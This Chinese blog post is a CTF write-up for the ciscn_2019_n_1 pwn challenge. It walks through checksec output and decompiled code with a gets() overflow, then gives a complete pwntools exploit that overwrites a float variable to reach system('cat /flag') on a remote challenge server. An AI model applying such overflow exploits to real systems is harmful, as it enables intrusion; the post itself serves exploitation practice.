我要学pwn.day4

最新推荐文章于 2023-10-01 19:47:51 发布
最新推荐文章于 2023-10-01 19:47:51 发布
阅读量179 收藏
点赞数
分类专栏: 我要学pwn 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45963786/article/details/118501048
版权

ciscn_2019_n_1

潜心修炼,从基础开始

这是一道简单的栈溢出覆盖变量

解题流程

1.查看文件
$ file ciscn_2019_n_1
ciscn_2019_n_1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8a733f5404b1e2c65e1758c7d92821eb8490f7c5, not stripped
2.查看保护
$ checksec ciscn_2019_n_1
[*] '/home/ctf/Downloads/pwnexercise/ciscn_2019_n1/ciscn_2019_n_1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

开启了NX保护

NX保护即数据不可执行

3.IDA反编译
int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  func();
  return 0;
}

main函数中没有问题,继续查看func()

int func()
{
  int result; // eax
  char v1[44]; // [rsp+0h] [rbp-30h] BYREF
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(v1);
  if ( v2 == 11.28125 )
    result = system("cat /flag");
  else
    result = puts("Its value should be 11.28125");
  return result;
}

发现目标函数system(“cat /flag”),同时存在危险函数gets

利用方法:利用v1进行栈溢出,覆盖变量v2的值,使之等于11.28125,则程序执行cat /flag

4.查看溢出长度

在这里插入图片描述
v1的位置是0x30,v2的位置是0x4,0x30-0x4计算出偏移,填充藏数据,在v2位置填充目标数据

这里需要注意的是需要将11.28125已Ieee-754标准转换位16进制,才能利用

在这里插入图片描述
这里给一个在线转换网址:https://www.h-schmidt.net/FloatConverter/IEEE754.html

5.编写EXP
# -*- coding:utf-8 -*-
#! /usr/bin/env python

from pwn import *


context(os="linux", arch="amd64")
# context.log_level="debug"

local = 0
elf = ELF('./ciscn_2019_n_1')

if local:
    pro = process('./ciscn_2019_n_1')
else:
    pro = remote('node4.buuoj.cn', 29925)


def get_shell():
    v2 = 0x41348000
    paylen = 0x30-0x4
    payload = b"A"*paylen+p64(v2)

    pro.sendlineafter('number.\n',payload)
    flag = pro.recvline()
    print(flag)


if __name__ == '__main__':
    get_shell()

因为溢出后执行的是cat /flag,所以不用交互,故使用recvline进行读取。

6.获得flag
$ python ciscn_2019_n_1Exp.py 
[*] '/home/ctf/Downloads/pwnexercise/ciscn_2019_n1/ciscn_2019_n_1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to node4.buuoj.cn on port 29925: Done
flag{0893d84d-1388-4aaa-b65b-cc8b5fe0b69d}

[*] Closed connection to node4.buuoj.cn port 29925

打完收工

名为逗比
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4387
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 260
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
ciscn_2019_c_1
qq_45913417的博客
11-18 8775
经典ret2libc,着实恶心到我了。前后捣鼓了将近3、4个小时,勉强把原理理解透彻。 边做题边C语言:艹! 输入字符串s加密逻辑: 1、如果是小写字母跟0xD异或 2、如果是大写字母跟0xE异或 3、如果是数字跟0xF异或 [ASCII码对照表]:(http://c.biancheng.net/c/ascii/) LibcSearcher工具:https://github.com/dev2ero/LibcSearcher from pwn import * from LibcSearcher i
pwn学习历程.pdf
09-30
标题中的“pwn学习历程.pdf”表明该文档是关于学习pwn(利用程序中的漏洞,通常用于CTF(Capture The Flag)比赛中的pwn题目)的详细学习路径和资料汇总。文档的描述中强调了内容的系统性、模块化以及实用性,特别...
hal stm32g4 pwn.zip
07-23
蓝桥杯的pwn stm43g4平台
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
pwncollege:部署pwn.college
02-24
大学该存储库具有部署pwn.college实例所需的工件。设置docker build -t pwncollege_challenge containers/pwncollege_challengecp -r CTFd-pwn-college-plugin CTFd/CTFd/pluginsdocker-compose up -ddocker run --...
Introduction-to-Pwn.pdf
09-09
要开始学习pwn,您需要: *具备基本的编程技能,例如C、Python等。 *了解操作系统的工作原理,例如Windows、Linux等。 *了解网络协议和安全机制,例如TCP/IP、HTTPS等。 *具备逆向工程和二进制分析的技能。 *学习...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
[BUUCTF]ciscn_2019_c_1 1
最新发布
weixin_55013445的博客
10-01 186
可知,该程序开启了NX(栈不可执行)保护再使用IDA进行反汇编对代码进行分析可知,漏洞点在encrypt()函数的gets()上到此,思路明确,我们可以通过gets()的栈溢出漏洞,获取libc的基地址,接着通过libc的基地址获取system和str_bin_sh的地址,最后执行system(“/bin/sh”)
ciscn_2019_c_1(ret2libc)
m0_62322730的博客
04-19 217
ciscn_2019_c_1(ret2libc) 萌新跟着别人的文章复现滴~还有很多疑问,本文有任何问题请指正。
ciscn_2019_c_1【BUUCTF】
qq_41696518的博客
08-26 1110
ciscn_2019_c_1【BUUCTF】
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1311
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
weiteUP-ciscn_2019_c_1
weixin_52111404的博客
08-07 1640
平衡栈、执行system函数前栈空间应栈对齐;LibcSearcher安装使用和原理浅析
学习pwn要学习哪些数学知识
05-18
学习 pwn 通常需要掌握以下数学知识: 1. 二进制和十六进制:pwn 题目通常会给出二进制或十六进制的数据,因此需要熟悉这两种进制的转换和计算。 2. 离散数学:离散数学是计算机科学中的一门重要课程,它涉及到许多 pwn 中用到的算法和数据结构,例如哈希表、图论、组合数学等。 3. 模运算:在 pwn 中,模运算经常被用来处理加密算法或者防止整数溢出等问题。 4. 基础数论:pwn 题目中经常涉及到素数、欧拉函数、费马小定理等基础数论概念,因此需要对这些内容有一定的了解。 5. 线性代数:在 pwn 中,矩阵运算和向量运算经常被用来解决密码学和加密算法相关的问题,因此需要对线性代数有一定的了解。 当然,不同的 pwn 题目可能需要的数学知识也会有所不同,但以上几个方面是比较基础和常见的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值